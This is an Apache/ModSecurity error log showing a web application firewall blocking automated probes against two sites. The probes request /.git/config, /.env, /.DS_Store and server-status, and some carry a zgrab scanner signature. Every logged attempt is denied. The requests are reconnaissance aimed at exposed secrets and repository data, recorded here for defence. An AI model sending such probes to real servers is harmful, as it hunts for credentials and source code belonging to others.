[Sun Jan 28 22:03:56.257858 2024] [:error] [pid 693508] [client 3.91.39.240:58582] [client 3.91.39.240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZbbBPPjdwTDGtIhSWzFa8QAAAAI"]
[Sun Jan 28 22:03:56.258039 2024] [:error] [pid 693508] [client 3.91.39.240:58582] [client 3.91.39.240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZbbBPPjdwTDGtIhSWzFa8QAAAAI"]
[Tue Feb 13 00:27:59.646190 2024] [:error] [pid 1066122] [client 31.220.0.86:48322] [client 31.220.0.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zcqpf3U0jylAyBbZHAg8vQAAAAk"]
[Tue Feb 13 00:27:59.647970 2024] [:error] [pid 1066122] [client 31.220.0.86:48322] [client 31.220.0.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zcqpf3U0jylAyBbZHAg8vQAAAAk"]
[Tue Feb 13 00:27:59.648449 2024] [:error] [pid 1066122] [client 31.220.0.86:48322] [client 31.220.0.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zcqpf3U0jylAyBbZHAg8vQAAAAk"]
[Tue Feb 20 23:25:20.444420 2024] [:error] [pid 1226343] [client 54.241.83.5:37778] [client 54.241.83.5] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZdUm0IwJPthQafZfK7SSIgAAAAM"]
[Tue Feb 20 23:25:20.445987 2024] [:error] [pid 1226343] [client 54.241.83.5:37778] [client 54.241.83.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZdUm0IwJPthQafZfK7SSIgAAAAM"]
[Tue Feb 20 23:25:20.446387 2024] [:error] [pid 1226343] [client 54.241.83.5:37778] [client 54.241.83.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZdUm0IwJPthQafZfK7SSIgAAAAM"]
[Tue Mar 19 19:31:30.915327 2024] [:error] [pid 1895925] [client 45.138.16.120:32894] [client 45.138.16.120] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfnaAkgbKbwAmXEU9RedVQAAAAY"]
[Tue Mar 19 19:31:30.916338 2024] [:error] [pid 1895925] [client 45.138.16.120:32894] [client 45.138.16.120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfnaAkgbKbwAmXEU9RedVQAAAAY"]
[Tue Mar 19 19:31:30.916559 2024] [:error] [pid 1895925] [client 45.138.16.120:32894] [client 45.138.16.120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfnaAkgbKbwAmXEU9RedVQAAAAY"]
[Tue Mar 19 19:31:36.223983 2024] [authz_core:error] [pid 1895955] [client 64.226.78.121:59088] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Mar 19 19:31:37.019080 2024] [:error] [pid 1895951] [client 64.226.78.121:59112] [client 64.226.78.121] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZfnaCRvt5DfNF7kl1pAu8wAAAAM"]
[Tue Mar 19 19:31:37.019352 2024] [:error] [pid 1895951] [client 64.226.78.121:59112] [client 64.226.78.121] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZfnaCRvt5DfNF7kl1pAu8wAAAAM"]
[Tue Mar 19 19:31:37.019579 2024] [:error] [pid 1895951] [client 64.226.78.121:59112] [client 64.226.78.121] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZfnaCRvt5DfNF7kl1pAu8wAAAAM"]
[Tue Mar 19 19:31:37.059838 2024] [:error] [pid 1895923] [client 64.226.78.121:59124] [client 64.226.78.121] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZfnaCVMesTzPhnVGT--F-QAAAAQ"]
[Tue Mar 19 19:31:37.060299 2024] [:error] [pid 1895923] [client 64.226.78.121:59124] [client 64.226.78.121] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZfnaCVMesTzPhnVGT--F-QAAAAQ"]
[Tue Mar 19 19:31:37.060790 2024] [:error] [pid 1895923] [client 64.226.78.121:59124] [client 64.226.78.121] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZfnaCVMesTzPhnVGT--F-QAAAAQ"]
[Tue Mar 19 19:31:37.098359 2024] [:error] [pid 1895957] [client 64.226.78.121:59132] [client 64.226.78.121] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfnaCY7aH3kikZtclYxzHQAAAAs"]
[Tue Mar 19 19:31:37.098620 2024] [:error] [pid 1895957] [client 64.226.78.121:59132] [client 64.226.78.121] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfnaCY7aH3kikZtclYxzHQAAAAs"]
[Tue Mar 19 19:31:37.098807 2024] [:error] [pid 1895957] [client 64.226.78.121:59132] [client 64.226.78.121] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfnaCY7aH3kikZtclYxzHQAAAAs"]
[Tue Mar 19 23:31:33.988637 2024] [:error] [pid 1898566] [client 171.67.70.233:40854] [client 171.67.70.233] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "ZfoSRYt8l-mXhcLl5PsGhwAAAAw"]
[Tue Mar 19 23:31:33.989614 2024] [:error] [pid 1898566] [client 171.67.70.233:40854] [client 171.67.70.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "ZfoSRYt8l-mXhcLl5PsGhwAAAAw"]
[Tue Mar 19 23:31:33.990036 2024] [:error] [pid 1898566] [client 171.67.70.233:40854] [client 171.67.70.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "ZfoSRYt8l-mXhcLl5PsGhwAAAAw"]
[Wed Mar 20 07:31:33.790831 2024] [:error] [pid 1901905] [client 171.67.70.238:57968] [client 171.67.70.238] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "ZfqCxaHxWWQI0AZfxScfcQAAAAQ"]
[Wed Mar 20 07:31:33.791913 2024] [:error] [pid 1901905] [client 171.67.70.238:57968] [client 171.67.70.238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "ZfqCxaHxWWQI0AZfxScfcQAAAAQ"]
[Wed Mar 20 07:31:33.792505 2024] [:error] [pid 1901905] [client 171.67.70.238:57968] [client 171.67.70.238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "ZfqCxaHxWWQI0AZfxScfcQAAAAQ"]
[Wed Mar 20 08:08:05.654908 2024] [:error] [pid 1901902] [client 45.138.16.120:50746] [client 45.138.16.120] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfqLVeLe3f75vpunvwXq2AAAAAE"]
[Wed Mar 20 08:08:05.655438 2024] [:error] [pid 1901902] [client 45.138.16.120:50746] [client 45.138.16.120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfqLVeLe3f75vpunvwXq2AAAAAE"]
[Wed Mar 20 08:08:05.655854 2024] [:error] [pid 1901902] [client 45.138.16.120:50746] [client 45.138.16.120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZfqLVeLe3f75vpunvwXq2AAAAAE"]
[Wed Mar 20 14:12:51.073511 2024] [:error] [pid 1904426] [client 3.249.60.110:41006] [client 3.249.60.110] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zfrg0_neJVFWeqXNxufCIgAAAAo"]
[Wed Mar 20 14:12:51.074146 2024] [:error] [pid 1904426] [client 3.249.60.110:41006] [client 3.249.60.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zfrg0_neJVFWeqXNxufCIgAAAAo"]
[Wed Mar 20 14:12:51.074531 2024] [:error] [pid 1904426] [client 3.249.60.110:41006] [client 3.249.60.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zfrg0_neJVFWeqXNxufCIgAAAAo"]
[Fri Mar 22 08:41:25.991027 2024] [:error] [pid 1963119] [client 193.32.162.87:46812] [client 193.32.162.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zf02JQzhs9miSdz79i79UQAAAAc"]
[Fri Mar 22 08:41:25.991647 2024] [:error] [pid 1963119] [client 193.32.162.87:46812] [client 193.32.162.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zf02JQzhs9miSdz79i79UQAAAAc"]
[Fri Mar 22 08:41:25.992151 2024] [:error] [pid 1963119] [client 193.32.162.87:46812] [client 193.32.162.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zf02JQzhs9miSdz79i79UQAAAAc"]
[Fri Mar 22 20:37:53.241852 2024] [:error] [pid 1963121] [client 54.208.180.148:52104] [client 54.208.180.148] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf3eEd_VF7vO-XZGQfXtbgAAAAg"]
[Fri Mar 22 20:37:53.242453 2024] [:error] [pid 1963121] [client 54.208.180.148:52104] [client 54.208.180.148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf3eEd_VF7vO-XZGQfXtbgAAAAg"]
[Fri Mar 22 20:37:53.242910 2024] [:error] [pid 1963121] [client 54.208.180.148:52104] [client 54.208.180.148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf3eEd_VF7vO-XZGQfXtbgAAAAg"]
[Sat Mar 23 03:06:11.271596 2024] [authz_core:error] [pid 1981903] [client 172.105.16.117:37068] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Mar 23 03:06:12.531673 2024] [:error] [pid 1981940] [client 172.105.16.117:37092] [client 172.105.16.117] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zf45FH08TUx7CY82_fLvNQAAAAs"]
[Sat Mar 23 03:06:12.532270 2024] [:error] [pid 1981940] [client 172.105.16.117:37092] [client 172.105.16.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zf45FH08TUx7CY82_fLvNQAAAAs"]
